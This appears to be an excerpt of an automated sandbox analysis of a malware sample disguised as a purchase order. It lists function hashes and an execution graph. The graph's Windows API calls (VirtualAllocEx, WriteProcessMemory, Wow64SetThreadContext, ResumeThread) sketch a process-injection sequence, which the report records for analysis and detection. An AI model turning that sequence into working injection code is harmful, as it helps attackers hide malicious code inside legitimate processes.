                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9f96737bd53f9f81948e81832a4d5a1012ff1f3ced6c6c8be5589bfb2ab74719
                                                                            • Instruction ID: af174c996e8e49745e82f9f48bb0e0b4833a858cd790f79adcb04616da7b27d1
                                                                            • Opcode Fuzzy Hash: 9f96737bd53f9f81948e81832a4d5a1012ff1f3ced6c6c8be5589bfb2ab74719
                                                                            • Instruction Fuzzy Hash: F9E092317042186FD3049A5EDC40E6BFBEDFFC9A20B21807AF504D7361CAB0AC0186A4
                                                                            Function 00BFD365 Relevance: .0, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d284fa6c8406c12a6df714f89514de892c877774f5850c2bbdfdb513c66deb11
                                                                            • Instruction ID: 16bab283eacf4076aebc61c7045c1482184c19722b2c832fd5736cf38b511928
                                                                            • Opcode Fuzzy Hash: d284fa6c8406c12a6df714f89514de892c877774f5850c2bbdfdb513c66deb11
                                                                            • Instruction Fuzzy Hash: D6E02B7670D1448F83115528A4D80FD7F62DBA612A71800BFD3C4C7602D551441BC356
                                                                            Function 08142FF1 Relevance: .0, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 875c3f40eb110e11b4dd63c5705a9d29702fddac61508961ed055aeb54863e4a
                                                                            • Instruction ID: 729a48550e3662184ad4c6ef3a00ca33cedbf9223c76b9608cb2ff6e11429e97
                                                                            • Opcode Fuzzy Hash: 875c3f40eb110e11b4dd63c5705a9d29702fddac61508961ed055aeb54863e4a
                                                                            • Instruction Fuzzy Hash: 5EF0307630A2505FC3118B29E8C4D5AFFA5EFCA22071581AAE549CB362C6305C05CB61
                                                                            Function 00BF49E8 Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f7bd7d78fcffd18afa897daa888ac8dd0d2ddd088dbb342e7e80f084c2930426
                                                                            • Instruction ID: 3d321a33c66ce68fd359a653318727a645af563d3913680cacd4780c7938273f
                                                                            • Opcode Fuzzy Hash: f7bd7d78fcffd18afa897daa888ac8dd0d2ddd088dbb342e7e80f084c2930426
                                                                            • Instruction Fuzzy Hash: ADE06D78C4534C9BCB01DFA8A5482ADBBF4EB4A300F2055E6D808D3241E7704F589740
                                                                            Function 0814239F Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5520a813186a6585dfd7ff5de73f76226ebe60a279574778aa40f9157c5462d4
                                                                            • Instruction ID: 080ab8ec731b367a38c4263ae7e48a932835e758e175eb2e4faf57cb824dadd1
                                                                            • Opcode Fuzzy Hash: 5520a813186a6585dfd7ff5de73f76226ebe60a279574778aa40f9157c5462d4
                                                                            • Instruction Fuzzy Hash: CEE026353053542BC71A862DA811E673FACCFC6621B0840BFF208CB182CA628883C3B2
                                                                            Function 08143000 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ae6b82ebcaa6d5bea230a5a830a1b98d02e049713d537f0079b6f6494816a883
                                                                            • Instruction ID: 8f43639328274e273d15c02abbfc0748c84bab911d70430cb00f79cd7a4f56bd
                                                                            • Opcode Fuzzy Hash: ae6b82ebcaa6d5bea230a5a830a1b98d02e049713d537f0079b6f6494816a883
                                                                            • Instruction Fuzzy Hash: 0FE08C763041046FC3108A0EEC88D06FBEDEFCC630B10803AFA09C7321CA30AC01C6A4
                                                                            Function 0814C9B0 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 82d26acf553f9bf937ff5ab79ea85873c8ae345ef40e3942fe30ac5c4c76a353
                                                                            • Instruction ID: d3778c738b0f5b0f23cd17037c3d950b40632e5c238c4287499c6d9fa22ec20b
                                                                            • Opcode Fuzzy Hash: 82d26acf553f9bf937ff5ab79ea85873c8ae345ef40e3942fe30ac5c4c76a353
                                                                            • Instruction Fuzzy Hash: 9BF03970205284CFD7169B70E82C1243B72FF1664631844ADE01AC72B3DB3A9882DB25
                                                                            Function 00BF49F0 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eef3c0edecf6a099422dd283ab6acb79a80c426ae1a484a806daecd1a2913bb8
                                                                            • Instruction ID: bc32d8ea70f2c847d78e1a59d68ac0ab737b79fd87bb72565753025fe4fd7b49
                                                                            • Opcode Fuzzy Hash: eef3c0edecf6a099422dd283ab6acb79a80c426ae1a484a806daecd1a2913bb8
                                                                            • Instruction Fuzzy Hash: CDE04678D5520CEBCB00EFE8A5492ADBBF8EB49301F2095A69808D3300EBB04F589B40
                                                                            Function 00BFB960 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 113657f388d659d3db13e19401ca2db85d08373ffbe2f3eda707a4452cbc44ab
                                                                            • Instruction ID: 3106501f460e1a615f374c72e0ed29f1749cedc5ea6297b3c4456293015f10bd
                                                                            • Opcode Fuzzy Hash: 113657f388d659d3db13e19401ca2db85d08373ffbe2f3eda707a4452cbc44ab
                                                                            • Instruction Fuzzy Hash: 1DD02B340047478FEB07F379EC040093F66ADC230074098E5D2400A12BEFE41D0443A0
                                                                            Function 00BFB970 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bbb13caf6cdddd8adf4a7247576c9e632da231c75ec736d0f40a5953d8ab934
                                                                            • Instruction ID: 85e97f572f45a344de08f84d92c887752c0ebba0dc2fb6645f80f06458ff5d41
                                                                            • Opcode Fuzzy Hash: 9bbb13caf6cdddd8adf4a7247576c9e632da231c75ec736d0f40a5953d8ab934
                                                                            • Instruction Fuzzy Hash: E5C0123045060BCAD909F779E9495153BAAAEC0700B50A968A20515519EFF829044690
                                                                            Function 00BFEBB4 Relevance: .0, Instructions: 3COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 26747ce9c6d8dc5584f96ae0867c05efeb8b4fb14c2d2f85d60f990e5448d1bd
                                                                            • Instruction ID: ff669f68b43ad122c12050569103619579e35424d9f5044f3c27a28a73d8bde2
                                                                            • Opcode Fuzzy Hash: 26747ce9c6d8dc5584f96ae0867c05efeb8b4fb14c2d2f85d60f990e5448d1bd
                                                                            • Instruction Fuzzy Hash:

                                                                            Non-executed Functions

                                                                            Function 079AA168 Relevance: 3.3, Instructions: 3301COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2985881190.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_79a0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8e321a43f413d20d921c919c3124caa96fbdba10f73dedf88eadbe3b201a2ea
                                                                            • Instruction ID: 7313cef23d12e8f9ce737c1516c3d67e1354477c27ca78d79c64d0bdf0b68f83
                                                                            • Opcode Fuzzy Hash: c8e321a43f413d20d921c919c3124caa96fbdba10f73dedf88eadbe3b201a2ea
                                                                            • Instruction Fuzzy Hash: 17537070A16658CBCB54FF78E89979DBBB1EF89200F4084E9D848A3354DF385D84CBA5
                                                                            Function 05160C90 Relevance: .5, Instructions: 476COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2984608976.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5160000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0a1d00b180d8c8fc59761f8a9bee1b8766187fb7348cea3adc3c06ffe8981c31
                                                                            • Instruction ID: c67df7a210bf6f0eaadffa4325627ce4c6f8938de9975f2c6c94ef0b59939941
                                                                            • Opcode Fuzzy Hash: 0a1d00b180d8c8fc59761f8a9bee1b8766187fb7348cea3adc3c06ffe8981c31
                                                                            • Instruction Fuzzy Hash: 654203B0D80745CFE718CF64F94C28D7BB1BB44318F906A89D9526B2E1DBB415AACF48
                                                                            Function 081221D3 Relevance: .4, Instructions: 393COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986151141.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8120000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf1412cb0e3f01806d677756f0370810bf59204584be376cdc9b68a20928eb59
                                                                            • Instruction ID: e675d6d2d549752a349ce2572e1ffbf7a6be4497b354448bd6a430067a6296fe
                                                                            • Opcode Fuzzy Hash: bf1412cb0e3f01806d677756f0370810bf59204584be376cdc9b68a20928eb59
                                                                            • Instruction Fuzzy Hash: 92D1E331B042618FCB18AB78C85466EBBE6AFC5720B24457DE156DB3A6CF34DD02C7A1
                                                                            Function 0812038F Relevance: .4, Instructions: 353COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986151141.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8120000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ada46fc33b27c8e80d943421f491530238f2157ddb7eeca829f7e0db5bafae3
                                                                            • Instruction ID: 433eb675484909092cac0abd243a7093a6d3cb08acc9dcb2bd23462c39e792a0
                                                                            • Opcode Fuzzy Hash: 2ada46fc33b27c8e80d943421f491530238f2157ddb7eeca829f7e0db5bafae3
                                                                            • Instruction Fuzzy Hash: C3B1B030B006559FEB58ABB9881033F7AE7AFC9750F14857CD04AEB395CE389D4287A1
                                                                            Function 079AF1A0 Relevance: .3, Instructions: 298COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2985881190.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_79a0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60186261d28b3735ba10d9fe5a653ea2a9faa90e6e7c6dd2b937a7842ff08dcb
                                                                            • Instruction ID: c93de9b786c842bcee2f95ff1570744b6d4479f5d1df819e3864f1c2f986c1e2
                                                                            • Opcode Fuzzy Hash: 60186261d28b3735ba10d9fe5a653ea2a9faa90e6e7c6dd2b937a7842ff08dcb
                                                                            • Instruction Fuzzy Hash: FAD1B4B4A01505CFDB08DF69C598AA9B7F2BF8D705F2580A8E505AB361DB31ED41CFA0
                                                                            Function 08140E11 Relevance: .3, Instructions: 271COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8103f4b3178388c818c84f3dfdce1a5cd7412b86edc821774d5337a02738cd5
                                                                            • Instruction ID: bc8412eaf69d692ad969b464fdb33640e330331a1d84bffe1b5f2c82971a3c71
                                                                            • Opcode Fuzzy Hash: a8103f4b3178388c818c84f3dfdce1a5cd7412b86edc821774d5337a02738cd5
                                                                            • Instruction Fuzzy Hash: 69D1F631D20B5ACACB01EB64D990A9DB7B1FFD5300F20C79AD10A77265EB706AC5CB91
                                                                            Function 08140E20 Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ed3ee071f200b6e55b24ff44dc74431f5cc4bb09cc4045d1e17ecff3d3cb696
                                                                            • Instruction ID: bf3246f5859c4e5e62f997b0bcec17d7d20d357aeea064b76b514b2dd868aba7
                                                                            • Opcode Fuzzy Hash: 3ed3ee071f200b6e55b24ff44dc74431f5cc4bb09cc4045d1e17ecff3d3cb696
                                                                            • Instruction Fuzzy Hash: 7ED1E635D20B5ACACB10EB64D99069DB7B1FFD5300F20C79AD10A77215EB706AC5CB91
                                                                            Function 051607A8 Relevance: .3, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2984608976.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5160000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce864969965a693b8b03d3f69c07b7364fa4334844d7b3f82a1b395ab771aa5a
                                                                            • Instruction ID: 7fbb48cb2299571411fcc949c9366d157d55486d26d069923474967edb990e90
                                                                            • Opcode Fuzzy Hash: ce864969965a693b8b03d3f69c07b7364fa4334844d7b3f82a1b395ab771aa5a
                                                                            • Instruction Fuzzy Hash: 63A17136E00219CFCF09DFB5D84459EB7B2FF88300B15857AE906AB262DB35D955CB90
                                                                            Function 05160F4D Relevance: .2, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2984608976.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5160000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 611a23e8e01a633bb2e19333259e122949d38381cbdbad8491c5e3dd0a00eda1
                                                                            • Instruction ID: 9368a94c64dc0140365ba2423ace6c8ce5a75d83357c1223d4433e982460122c
                                                                            • Opcode Fuzzy Hash: 611a23e8e01a633bb2e19333259e122949d38381cbdbad8491c5e3dd0a00eda1
                                                                            • Instruction Fuzzy Hash: B4C1E9B0C81745CAE718CF65F94828D7BB1BB85314F916B89D9622B2D0DBB414EECF48

                                                                            Execution Graph

                                                                            Execution Coverage:18.2%
                                                                            Dynamic/Decrypted Code Coverage:98.3%
                                                                            Signature Coverage:1.7%
                                                                            Total number of Nodes:176
                                                                            Total number of Limit Nodes:10
                                                                            execution_graph 65218 6da0c78 65219 6da0c4d 65218->65219 65219->65218 65220 6da0ccd 65219->65220 65223 6da18c3 65219->65223 65228 6da18d0 65219->65228 65224 6da188d 65223->65224 65225 6da18c7 65223->65225 65224->65220 65226 6da19aa 65225->65226 65232 6da2791 65225->65232 65229 6da18fb 65228->65229 65230 6da19aa 65229->65230 65231 6da2791 3 API calls 65229->65231 65230->65230 65231->65230 65233 6da27a0 65232->65233 65234 6da27a9 65233->65234 65236 6da27dd CreateWindowExW 65233->65236 65240 6da2791 2 API calls 65234->65240 65242 6da27f0 65234->65242 65246 6da27e5 65234->65246 65235 6da27d5 65235->65226 65238 6da2914 65236->65238 65240->65235 65243 6da2858 CreateWindowExW 65242->65243 65245 6da2914 65243->65245 65245->65245 65247 6da27f1 CreateWindowExW 65246->65247 65249 6da2914 65247->65249 65191 e4b1348 65192 e4b1390 VirtualProtectEx 65191->65192 65194 e4b13ce 65192->65194 65302 e4b0b88 65303 e4b0b3a VirtualAllocEx 65302->65303 65305 e4b0b96 65302->65305 65306 e4b0b55 65303->65306 65307 15bd01c 65308 15bd034 65307->65308 65314 15bd08e 65308->65314 65315 6da2db0 65308->65315 65319 6da299c 65308->65319 65327 6da29ae 65308->65327 65335 6da3af8 65308->65335 65343 6da2da0 65308->65343 65316 6da2dd6 65315->65316 65317 6da299c CallWindowProcW 65316->65317 65318 6da2df7 65317->65318 65318->65314 65320 6da29a7 65319->65320 65321 6da3b69 65320->65321 65323 6da3b59 65320->65323 65357 6da2ac4 65321->65357 65347 6da3c90 65323->65347 65352 6da3c80 65323->65352 65324 6da3b67 65329 6da2997 65327->65329 65328 6da3b69 65330 6da2ac4 CallWindowProcW 65328->65330 65329->65328 65331 6da3b59 65329->65331 65332 6da3b67 65330->65332 65333 6da3c90 CallWindowProcW 65331->65333 65334 6da3c80 CallWindowProcW 65331->65334 65333->65332 65334->65332 65338 6da3b35 65335->65338 65336 6da3b69 65337 6da2ac4 CallWindowProcW 65336->65337 65340 6da3b67 65337->65340 65338->65336 65339 6da3b59 65338->65339 65341 6da3c90 CallWindowProcW 65339->65341 65342 6da3c80 CallWindowProcW 65339->65342 65341->65340 65342->65340 65344 6da2dd6 65343->65344 65345 6da299c CallWindowProcW 65344->65345 65346 6da2df7 65345->65346 65346->65314 65348 6da3ca4 65347->65348 65361 6da3d48 65348->65361 65364 6da3d37 65348->65364 65349 6da3d30 65349->65324 65353 6da3ca4 65352->65353 65355 6da3d48 CallWindowProcW 65353->65355 65356 6da3d37 CallWindowProcW 65353->65356 65354 6da3d30 65354->65324 65355->65354 65356->65354 65358 6da2acf 65357->65358 65359 6da524a CallWindowProcW 65358->65359 65360 6da51f9 65358->65360 65359->65360 65360->65324 65362 6da3d59 65361->65362 65367 6da5190 65361->65367 65362->65349 65365 6da3d59 65364->65365 65366 6da5190 CallWindowProcW 65364->65366 65365->65349 65366->65365 65368 6da2ac4 CallWindowProcW 65367->65368 65369 6da519a 65368->65369 65369->65362 65387 e4b1da0 65388 e4b1de0 ResumeThread 65387->65388 65390 e4b1e11 65388->65390 65250 851d9e0 65251 851d9f4 65250->65251 65252 851da81 65251->65252 65261 8c64f07 65251->65261 65265 8c64e78 65251->65265 65269 8c65a4b 65251->65269 65273 8c64dab 65251->65273 65277 8c6567a 65251->65277 65281 8c6579a 65251->65281 65285 8c65ecc 65251->65285 65290 8c64e34 65251->65290 65296 8c67368 65261->65296 65299 8c67362 65261->65299 65262 8c64f1b 65266 8c64e35 65265->65266 65266->65265 65267 8c67362 VirtualProtect 65266->65267 65268 8c67368 VirtualProtect 65266->65268 65267->65266 65268->65266 65271 8c67362 VirtualProtect 65269->65271 65272 8c67368 VirtualProtect 65269->65272 65270 8c65a5e 65271->65270 65272->65270 65275 8c67362 VirtualProtect 65273->65275 65276 8c67368 VirtualProtect 65273->65276 65274 8c64d0f 65274->65251 65275->65274 65276->65274 65279 8c67362 VirtualProtect 65277->65279 65280 8c67368 VirtualProtect 65277->65280 65278 8c6568b 65279->65278 65280->65278 65283 8c67362 VirtualProtect 65281->65283 65284 8c67368 VirtualProtect 65281->65284 65282 8c657ae 65283->65282 65284->65282 65286 8c65ed5 65285->65286 65288 8c67362 VirtualProtect 65286->65288 65289 8c67368 VirtualProtect 65286->65289 65287 8c65ee7 65288->65287 65289->65287 65291 8c64e35 65290->65291 65294 8c67362 VirtualProtect 65290->65294 65295 8c67368 VirtualProtect 65290->65295 65292 8c67362 VirtualProtect 65291->65292 65293 8c67368 VirtualProtect 65291->65293 65292->65291 65293->65291 65294->65291 65295->65291 65297 8c673b0 VirtualProtect 65296->65297 65298 8c673ea 65297->65298 65298->65262 65300 8c673b0 VirtualProtect 65299->65300 65301 8c673ea 65300->65301 65301->65262 65370 e4b1b18 65371 e4b1b5d Wow64SetThreadContext 65370->65371 65373 e4b1ba5 65371->65373 65195 851e9c8 65196 851ea10 VirtualProtect 65195->65196 65197 851ea4a 65196->65197 65391 8826378 65392 88263aa 65391->65392 65396 882d1a0 65392->65396 65400 882d1b0 65392->65400 65393 882ba49 65397 882d1e1 65396->65397 65404 882d440 65397->65404 65398 882d299 65398->65393 65401 882d1e1 65400->65401 65403 882d440 DeleteFileW 65401->65403 65402 882d299 65402->65393 65403->65402 65405 882d454 65404->65405 65408 882d7e0 65405->65408 65409 882d803 65408->65409 65412 8824c18 65409->65412 65413 882dc80 DeleteFileW 65412->65413 65415 882d74a 65413->65415 65415->65398 65198 e4b0e50 65199 e4b0e98 WriteProcessMemory 65198->65199 65201 e4b0eef 65199->65201 65374 e4b2110 65375 e4b229b 65374->65375 65376 e4b2136 65374->65376 65376->65375 65379 e4b238a PostMessageW 65376->65379 65381 e4b2390 PostMessageW 65376->65381 65380 e4b23fc 65379->65380 65380->65376 65382 e4b23fc 65381->65382 65382->65376 65202 8c68bd8 65204 8c68bff 65202->65204 65203 8c68d6e 65204->65203 65206 8c69281 65204->65206 65207 8c692c3 65206->65207 65208 8c696f4 65207->65208 65210 8c6bc68 65207->65210 65208->65204 65212 8c6bc8f 65210->65212 65211 8c6bd53 65211->65207 65212->65211 65214 8c6e348 65212->65214 65215 8c6e3c7 CreateProcessAsUserW 65214->65215 65217 8c6e4c8 65215->65217 65383 8c6fe18 65384 8c6fe5d Wow64GetThreadContext 65383->65384 65386 8c6fea5 65384->65386

                                                                            Executed Functions

                                                                            Function 0884554F Relevance: 5.6, Instructions: 5643COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 884554f-8845796 28 884579c-88464e1 0->28 29 88477e9-8847ace 0->29 439 88464e7-88467c5 28->439 440 88467cd-88477e1 28->440 104 8847ad4-8848a7e 29->104 105 8848a86-8849afc 29->105 104->105 695 8849b02-8849e3b 105->695 696 8849e43-8849e56 105->696 439->440 440->29 695->696 701 884a503-884b3db 696->701 702 8849e5c-884a4fb 696->702 1084 884b3db call 884c9c0 701->1084 1085 884b3db call 884c971 701->1085 702->701 1083 884b3e1-884b3e8 1084->1083 1085->1083
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871362885.0000000008840000.00000040.00000800.00020000.00000000.sdmp, Offset: 08840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e19b01a336f58298ecf424849cd45dd90f57fe1a7719d117ce72df961c2c225d
                                                                            • Instruction ID: 51e13375c3dcb725515d09a6cf956e236d17925baed809f5efdff3c6f0a0c86c
                                                                            • Opcode Fuzzy Hash: e19b01a336f58298ecf424849cd45dd90f57fe1a7719d117ce72df961c2c225d
                                                                            • Instruction Fuzzy Hash: 82C31A74A06218CBDB68EF78E99526CBBB2FB89301F4054EDD489A7350DE349E84CF51
                                                                            Function 08845568 Relevance: 5.6, Instructions: 5633COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1086 8845568-8845796 1114 884579c-88464e1 1086->1114 1115 88477e9-8847ace 1086->1115 1525 88464e7-88467c5 1114->1525 1526 88467cd-88477e1 1114->1526 1190 8847ad4-8848a7e 1115->1190 1191 8848a86-8849afc 1115->1191 1190->1191 1781 8849b02-8849e3b 1191->1781 1782 8849e43-8849e56 1191->1782 1525->1526 1526->1115 1781->1782 1787 884a503-884b3db 1782->1787 1788 8849e5c-884a4fb 1782->1788 2170 884b3db call 884c9c0 1787->2170 2171 884b3db call 884c971 1787->2171 1788->1787 2169 884b3e1-884b3e8 2170->2169 2171->2169
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871362885.0000000008840000.00000040.00000800.00020000.00000000.sdmp, Offset: 08840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 750b584ae1de6061ac609bfabbc347736166f7f1c9b979726fe5b74e6f038ad8
                                                                            • Instruction ID: 8d840ee6e6b572c82a60b344cd64e23e787b3e0cd92dfd6bc646333bce2f3ad6
                                                                            • Opcode Fuzzy Hash: 750b584ae1de6061ac609bfabbc347736166f7f1c9b979726fe5b74e6f038ad8
                                                                            • Instruction Fuzzy Hash: F3C31A74A06218CBDB68EF78E99566CBBB2FB89301F4054EDD489A3350DE349E84CF51
                                                                            Function 018480D8 Relevance: 1.2, Instructions: 1161COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3847708053.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_1840000_vexplorerez.jbxd
                                                                            Similarity
